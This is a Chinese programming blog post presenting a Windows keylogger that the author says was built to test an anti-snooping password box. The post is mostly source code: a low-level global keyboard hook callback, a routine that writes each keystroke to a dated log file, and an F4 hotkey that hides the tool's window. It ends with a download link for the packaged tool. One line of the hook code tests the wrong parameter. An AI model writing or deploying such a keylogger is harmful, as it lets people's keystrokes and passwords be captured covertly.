最近在研究反监听密码框的开发。 做这个东西是为了测试密码框的效果。 用的是WH_KEYBOARD_LL钩子。 我暂时还没找到防止底层键盘全局钩子的方法。QQ的密码可以用这种方法监听到,但是不是明文。不知道它是怎么做到的。
我也给这个工具做了个隐藏键 F4 。
开发工具是VS2008
![](http://www.cppblog.com/images/cppblog_com/pencil/keyloger.jpg)
钩子回调函数中的代码:
1
LRESULT CALLBACK LowLevelKeyboardProc(int nCode,
2
WPARAM wParam,
3
LPARAM lParam
4
)
5![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](http://www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
6
PKBDLLHOOKSTRUCT kbhs=(PKBDLLHOOKSTRUCT)lParam;
7
if (nCode<0)
8![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
9
return CallNextHookEx(hhKeyboard,nCode,wParam,lParam);
10
}
11
if (HC_ACTION==nCode)
12![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
13
if (WM_KEYDOWN==wParam || WM_SYSKEYDOWN==lParam)
14![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
15
if (VK_F4==kbhs->vkCode)
16![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
17
//先判断窗口是show or hide
18
m_hWnd2=FindWindow(NULL,L"KeyboardLoger Prees [F4] to hide or show me.");
19
if (IsWindowVisible(m_hWnd2))
20![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
21
ShowWindow(m_hWnd2,SW_HIDE);
22
return 0;
23
}
24
else
25![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
26
if (NULL==m_hWnd2)
27![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
28
AfxMessageBox(L"查找失败!");
29
return 0;
30
}
31
ShowWindow(m_hWnd2,SW_RESTORE);
32
//UpdateWindow(m_hWnd);
33
BringWindowToTop(m_hWnd);
34
SetForegroundWindow(m_hWnd);
35
return 1;
36
}
37
}
38![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
39
char c[1];
40![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
41
c[0]=kbhs->vkCode;
42![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
43
SaveLog(c);
44
}
45
}
46
return CallNextHookEx(hhKeyboard,nCode,wParam,lParam);
47
}
字符保存的代码:
1
void SaveLog(char* c)
2![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](http://www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
3
//AfxMessageBox(L"进入存储程序");
4
CTime tm=CTime::GetCurrentTime();
5![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
6
CString name;
7
TCHAR* szPath[MAX_PATH];
8
::GetModuleFileName(GetModuleHandle(L"LogerDll"),(LPTSTR)szPath,MAX_PATH);
9
CString path=(LPTSTR)szPath;
10
path.Replace(L"\\LogerDll.dll",L"");
11
name.Format(L"\\Key_%d_%d.log",tm.GetMonth(),tm.GetDay());
12
path+=name;
13
14
15![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
16
CFile file;
17![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
18
if(!file.Open(path,CFile::modeReadWrite))
19![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
20![](http://www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
21![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
22
file.Open(path,CFile::modeCreate|CFile::modeReadWrite);
23![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
24
}
25![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
26
file.SeekToEnd();
27![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
28
file.Write(c,1);
29![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
30
file.Close();
31![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
32![](http://www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
33
}
下载地址:http://www.cppblog.com/Files/pencil/KeyboardLoger.rar